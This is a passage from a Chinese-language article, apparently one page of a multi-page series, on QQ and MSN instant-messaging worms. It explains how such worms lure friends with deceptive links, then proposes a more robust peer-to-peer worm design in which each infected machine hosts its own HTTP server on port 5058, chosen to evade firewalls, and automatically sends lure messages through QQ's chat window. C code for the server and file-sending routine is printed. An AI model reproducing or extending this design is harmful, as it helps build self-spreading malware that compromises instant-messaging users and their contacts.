总之，这类病毒的共性是：

   一旦在机器上获得控制权，会首先查看用户是否安装了QQ或MSN Messager，发现后，该蠕虫就会通过对话窗口向在线好友发送欺骗性的信息，信息包含一个超级连接，因为在接受窗口中可以直接点击连接，启动IE,IE会和这个服务器连接，下载html页面。这个页面中含有恶意代码，把蠕虫下载到本机并运行，完成了一次传播。然后再以这台机器为基点，向本机所能发现的好友发送同样的欺骗性消息，传播迅速。

   欺骗信息一般是邀请你去发送过来的网址去看看，如“看看这个，好东西 http://www.xxx.com/cool.html"。

   从传播手段上看，病毒传播是一种C/S模式，即每台机器都是从指定的服务器下载，比如GFleming是，http://home.no.net;QQ密码记录器是http://xmc.nease.net;‘Cool Worm‘是http://www.masenko-media.net/.这种方法的局限性是，一旦网站被封闭，病毒也就寿终正寝，不攻自灭了。

  

二.基于P2P思想QQ蠕虫的原理

   为了增强蠕虫的健壮性，这里提出一种新思路：每感染一台机器后，都会在本机创建一个最简单的http服务器，然后启动新线程，在新线程中寻找QQ的”发送消息“窗口，一旦找到，通过设置消息文本框的内容并控制”发送消息(&S)"按钮来达到发送欺骗性消息的目的。

   当对方收到消息，点击连接后，就会启动IE,IE和第一台机器的http服务器通信，下载html页面并执行其中的vbs代码，vbs将自身拷贝到机器上并运行，蠕虫完成一次传播。然后在新感染的机器上创建http服务器，再向他的好友发送消息。

   主要代码如下（为节约篇幅，省略不必要的初始化和错误判断）：

1. http服务器的实现

  

      LisenSocket  = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

      saServer.sin_family = AF_INET;

      saServer.sin_port = htons(5058);

      saServer.sin_addr.s_addr = INADDR_ANY;

      bind(LisenSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));

      listen(LisenSocket, SOMAXCONN);

  

      CreateThread(0,0,(LPTHREAD_START_ROUTINE)SendQQMsg,0,0,0);

      

      while(TRUE)

      {

        peerSocket=accept(LisenSocket,(LPSOCKADDR)&SockAddr,&nLen);          SendFile();        

      }

  

      void SendFile()

      {        

        BYTE buf[1024];

        DWORD ByteRead;



        ::SetFilePointer(hFile,0,0,FILE_BEGIN);

    

        ReadFile(hFile,buf,1024,&ByteRead,0);

        while(ByteRead)

        {

              send(peerSocket,(const char *)buf,ByteRead,0);    

              ReadFile(hFile,buf,1024,&ByteRead,0);

        }

        closesocket(peerSocket);

       }

     服务器在5058端口阻塞等待,不使用80,是避免防火墙对80号端口的敏感和限制。接受到来自远程的连接（由ie做客户端）后，把html文件传送过去，关闭连接。

上一页  [1] [2] [3] [4] [5] 下一页